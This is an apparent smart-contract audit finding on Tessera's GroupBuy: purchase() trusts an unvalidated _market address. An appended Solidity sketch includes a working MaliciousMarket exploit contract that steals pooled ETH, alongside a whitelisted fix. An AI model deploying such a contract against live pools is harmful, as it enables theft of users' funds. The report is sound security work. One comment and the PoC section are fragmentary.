Attacker can steal the amount collected so far in the GroupBuy for NFT purchase. #47
Comments
HickupHH3 marked the issue as primary issue
While #39 has better formatting, I found this report's POC and description to be more succinct.
HickupHH3 marked the issue as selected for report
mehtaculous marked the issue as sponsor confirmed
Agree with High severity. Solution is to check that the
Lines of code
https://github.com/code-423n4/2022-12-tessera/blob/f37a11407da2af844bbfe868e1422e3665a5f8e4/src/modules/GroupBuy.sol#L204
Vulnerability details
Description
purchase() in GroupBuy.sol executes the purchase call for the group. After safety checks, the NFT is bought with _market's execute() function. Supposedly it deploys a vault which owns the NFT. The code makes sure the vault is the new owner of the NFT and exits.
The issue is that the user-supplied _market variable is not validated at all. The attacker can pass their malicious contract, which uses the passed funds to buy the NFT and store it in the attacker's wallet. It will return the NFT-holding wallet, so the checks will pass. As a result, the attacker has the NFT while they could have contributed nothing to the GroupBuy. The attacker can also just steal the supplied ETH and return the current address which holds the NFT.
Impact
Attacker can steal the amount collected so far in the GroupBuy for NFT purchase.
Proof of Concept
minReservePrices[_poolId] * filledQuantities[_poolId], as checked in line 182.
Tools Used
Manual audit
Recommended Mitigation Steps
_market should be whitelisted, or supplied in createPool stage and able to be scrutinized.
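The following is an added example, not code from the Tessera repository or from the report, sketching the attack path described above next to the whitelist mitigation the report recommends. The contract and function names (MaliciousMarket, GroupBuySketch, purchaseVulnerable, purchaseHardened, allowedMarkets, setMarket) and the exact shape of the IMarketBuyer interface are assumptions made for illustration; only the price bound against minReservePrices * filledQuantities and the post-call ownerOf check mirror what the report describes.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Assumed market-buyer interface (hypothetical shape, chosen to match the report's
// description of "_market's execute()" returning the vault that owns the NFT).
interface IMarketBuyer {
    function execute(bytes memory _order) external payable returns (address vault);
}

interface IERC721 {
    function ownerOf(uint256 tokenId) external view returns (address);
}

// Attacker-controlled "market". It pockets the ETH the GroupBuy forwards as
// `_price` and reports whatever address currently holds the NFT as the "vault",
// so the `ownerOf(_tokenId) == vault` check passes without any purchase at all.
contract MaliciousMarket is IMarketBuyer {
    address payable public immutable attacker;
    address public immutable nft;
    uint256 public immutable tokenId;

    constructor(address _nft, uint256 _tokenId) {
        attacker = payable(msg.sender);
        nft = _nft;
        tokenId = _tokenId;
    }

    function execute(bytes memory) external payable override returns (address vault) {
        // Steal the pooled ETH.
        (bool ok, ) = attacker.call{value: msg.value}("");
        require(ok, "transfer failed");
        // Satisfy the post-call ownership check by returning the current owner.
        vault = IERC721(nft).ownerOf(tokenId);
    }
}

// Hypothetical, stripped-down sketch of the call sequence, not the Tessera contract.
contract GroupBuySketch {
    address public immutable owner;
    mapping(address => bool) public allowedMarkets;          // assumed whitelist
    mapping(uint256 => uint256) public minReservePrices;
    mapping(uint256 => uint256) public filledQuantities;

    error InvalidPurchase();
    error UnsuccessfulPurchase();
    error MarketNotAllowed(address market);

    constructor() {
        owner = msg.sender;
    }

    receive() external payable {}

    // Assumed admin function: only markets registered here may receive pool ETH.
    function setMarket(address _market, bool _allowed) external {
        require(msg.sender == owner, "not owner");
        allowedMarkets[_market] = _allowed;
    }

    // Vulnerable shape: `_market` is taken on trust, so the whole `_price`
    // (bounded only by the reserve-price check) goes to attacker code.
    function purchaseVulnerable(
        uint256 _poolId,
        address _market,
        address _nftContract,
        uint256 _tokenId,
        uint256 _price,
        bytes memory _purchaseOrder
    ) external {
        if (_price > minReservePrices[_poolId] * filledQuantities[_poolId]) revert InvalidPurchase();
        address vault = IMarketBuyer(_market).execute{value: _price}(_purchaseOrder);
        if (IERC721(_nftContract).ownerOf(_tokenId) != vault) revert UnsuccessfulPurchase();
    }

    // Hardened shape: reject unknown markets before sending any ETH. As an extra
    // check beyond the report's suggestion, also refuse a "vault" that already
    // owned the token before the call, which defeats the "return the current
    // owner" trick even if a whitelisted market were buggy.
    function purchaseHardened(
        uint256 _poolId,
        address _market,
        address _nftContract,
        uint256 _tokenId,
        uint256 _price,
        bytes memory _purchaseOrder
    ) external {
        if (!allowedMarkets[_market]) revert MarketNotAllowed(_market);
        if (_price > minReservePrices[_poolId] * filledQuantities[_poolId]) revert InvalidPurchase();
        address ownerBefore = IERC721(_nftContract).ownerOf(_tokenId);
        address vault = IMarketBuyer(_market).execute{value: _price}(_purchaseOrder);
        if (vault == ownerBefore || IERC721(_nftContract).ownerOf(_tokenId) != vault) {
            revert UnsuccessfulPurchase();
        }
    }
}
```

Deploying MaliciousMarket pointed at the pool's target NFT and calling purchaseVulnerable with it as `_market` drains up to minReservePrices[_poolId] * filledQuantities[_poolId] from the pool; the same call against purchaseHardened reverts with MarketNotAllowed before any ETH leaves the contract. Whether the whitelist lives in a separate admin function as sketched here or the market is fixed at createPool time, as the report also suggests, the key property is that the address receiving the pool's ETH is no longer chosen by the caller of purchase().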